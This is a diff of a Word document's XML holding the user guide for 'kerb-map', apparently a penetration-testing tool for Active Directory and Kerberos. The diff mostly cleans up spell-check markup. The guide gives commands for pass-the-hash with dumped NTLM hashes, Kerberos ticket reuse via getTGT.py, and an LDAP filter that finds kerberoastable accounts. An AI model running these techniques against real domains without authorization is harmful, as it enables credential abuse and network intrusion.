+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="40" w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Maps all domain trusts with SID filtering risk assessment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="60" w:after="60"/>
       </w:pPr>
       <w:r>
@@ -4765,30 +3923,20 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="3" w:name="_Toc224561283"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>1.2  Philosophy</w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="60" w:after="80"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t>kerb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>-map is built around three principles:</w:t>
+        <w:t>kerb-map is built around three principles:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4836,21 +3984,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Don't rebuild what exists — the tool orchestrates </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>impacket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>, ldap3, and existing protocol libraries rather than reimplementing them. It adds scoring, correlation, and workflow on top.</w:t>
+        <w:t>Don't rebuild what exists — the tool orchestrates impacket, ldap3, and existing protocol libraries rather than reimplementing them. It adds scoring, correlation, and workflow on top.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4869,12 +4003,10 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="4" w:name="_Toc224561284"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>1.3  Prerequisites</w:t>
       </w:r>
       <w:bookmarkEnd w:id="4"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -5096,7 +4228,6 @@
             </w:tcMar>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -5106,7 +4237,6 @@
               </w:rPr>
               <w:t>impacket</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5408,15 +4538,7 @@
       <w:bookmarkStart w:id="5" w:name="_Toc224561285"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>2</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Quick</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Start</w:t>
+        <w:t>2.  Quick Start</w:t>
       </w:r>
       <w:bookmarkEnd w:id="5"/>
     </w:p>
@@ -5428,13 +4550,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="6" w:name="_Toc224561286"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>2.1  Basic</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Scan — Password Authentication</w:t>
+      <w:r>
+        <w:t>2.1  Basic Scan — Password Authentication</w:t>
       </w:r>
       <w:bookmarkEnd w:id="6"/>
     </w:p>
@@ -5495,27 +4612,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u jsmith -p Password123</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -p Password123</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5537,13 +4634,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="7" w:name="_Toc224561287"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>2.2  Pass</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>-the-Hash</w:t>
+      <w:r>
+        <w:t>2.2  Pass-the-Hash</w:t>
       </w:r>
       <w:bookmarkEnd w:id="7"/>
     </w:p>
@@ -5555,21 +4647,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Supply an NTLM hash instead of a plaintext password. Accepts either the full </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>LM:NT</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> format or the NT hash alone (the LM half is automatically padded):</w:t>
+        <w:t>Supply an NTLM hash instead of a plaintext password. Accepts either the full LM:NT format or the NT hash alone (the LM half is automatically padded):</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -5618,19 +4696,8 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve"># Full </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>LM:NT</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t># Full LM:NT</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -5660,27 +4727,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u jsmith \</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith \</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5804,27 +4851,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u jsmith \</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith \</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5877,13 +4904,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="8" w:name="_Toc224561288"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>2.3  Kerberos</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Ticket (ccache)</w:t>
+      <w:r>
+        <w:t>2.3  Kerberos Ticket (ccache)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
     </w:p>
@@ -5895,21 +4917,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Use </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>a previously</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> obtained Kerberos TGT. Point KRB5CCNAME at your ccache file before running:</w:t>
+        <w:t>Use a previously obtained Kerberos TGT. Point KRB5CCNAME at your ccache file before running:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -5989,27 +4997,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u jsmith -k</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -k</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6042,21 +5030,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="9" w:name="_Toc224561289"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>2.4  Full</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Scan </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>With</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> CVEs and JSON Export</w:t>
+      <w:r>
+        <w:t>2.4  Full Scan With CVEs and JSON Export</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
     </w:p>
@@ -6106,27 +5081,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u jsmith -p Password123 \</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -p Password123 \</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6277,14 +5232,9 @@
       <w:bookmarkStart w:id="10" w:name="_Toc224561290"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>3</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Authentication</w:t>
+        <w:t>3.  Authentication</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6313,13 +5263,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="11" w:name="_Toc224561291"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>3.1  Plaintext</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Password (-p)</w:t>
+      <w:r>
+        <w:t>3.1  Plaintext Password (-p)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="11"/>
     </w:p>
@@ -6331,21 +5276,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Authenticates via NTLM with a plaintext password. The credentials are never written </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> disk by kerb-map itself.</w:t>
+        <w:t>Authenticates via NTLM with a plaintext password. The credentials are never written to disk by kerb-map itself.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6394,27 +5325,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u jsmith -p Summer2024!</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -p Summer2024!</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6436,13 +5347,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="12" w:name="_Toc224561292"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>3.2  Pass</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>-the-Hash (-H)</w:t>
+      <w:r>
+        <w:t>3.2  Pass-the-Hash (-H)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="12"/>
     </w:p>
@@ -6454,21 +5360,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Uses the NTLM hash directly, bypassing the need for a plaintext password. This is the standard method when you have obtained hashes from a </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>secretsdump</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> or LSASS dump.</w:t>
+        <w:t>Uses the NTLM hash directly, bypassing the need for a plaintext password. This is the standard method when you have obtained hashes from a secretsdump or LSASS dump.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6517,27 +5409,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u jsmith \</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith \</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6582,21 +5454,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">The tool accepts either NT-only (32 hex chars) or the full </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>LM:NT</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> format. If only NT is provided, the LM half is automatically padded with the empty LM hash (aad3b435b51404eeaad3b435b51404ee).</w:t>
+        <w:t>The tool accepts either NT-only (32 hex chars) or the full LM:NT format. If only NT is provided, the LM half is automatically padded with the empty LM hash (aad3b435b51404eeaad3b435b51404ee).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6615,13 +5473,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="13" w:name="_Toc224561293"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>3.3  Kerberos</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ccache (-k)</w:t>
+      <w:r>
+        <w:t>3.3  Kerberos ccache (-k)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="13"/>
     </w:p>
@@ -6713,47 +5566,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">getTGT.py </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>jsmith:Password</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>123</w:t>
+              <w:t>getTGT.py corp.local/jsmith:Password123</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6877,47 +5690,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-dc dc01.corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -u Administrator -k</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc dc01.corp.local -u Administrator -k</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6943,15 +5716,7 @@
       <w:bookmarkStart w:id="14" w:name="_Toc224561294"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>4</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Module</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Reference</w:t>
+        <w:t>4.  Module Reference</w:t>
       </w:r>
       <w:bookmarkEnd w:id="14"/>
     </w:p>
@@ -6982,21 +5747,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="15" w:name="_Toc224561295"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>4.1  SPN</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scanner  (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>--spn)</w:t>
+      <w:r>
+        <w:t>4.1  SPN Scanner  (--spn)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="15"/>
     </w:p>
@@ -7086,47 +5838,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>(&amp;(servicePrincipalName=</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>*)(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>!(objectClass=computer</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>))(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>!(cn=krbtgt))</w:t>
+              <w:t>(&amp;(servicePrincipalName=*)(!(objectClass=computer))(!(cn=krbtgt))</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7157,47 +5869,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(!(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>userAccountControl:1.2.840.113556.1.4.</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>803:=</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>2)))</w:t>
+              <w:t xml:space="preserve">  (!(userAccountControl:1.2.840.113556.1.4.803:=2)))</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8347,21 +7019,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="19" w:name="_Toc224561299"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>4.2  AS</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-REP </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scanner  (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>--asrep)</w:t>
+      <w:r>
+        <w:t>4.2  AS-REP Scanner  (--asrep)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="19"/>
     </w:p>
@@ -8369,19 +7028,11 @@
       <w:pPr>
         <w:spacing w:before="60" w:after="80"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t>Finds</w:t>
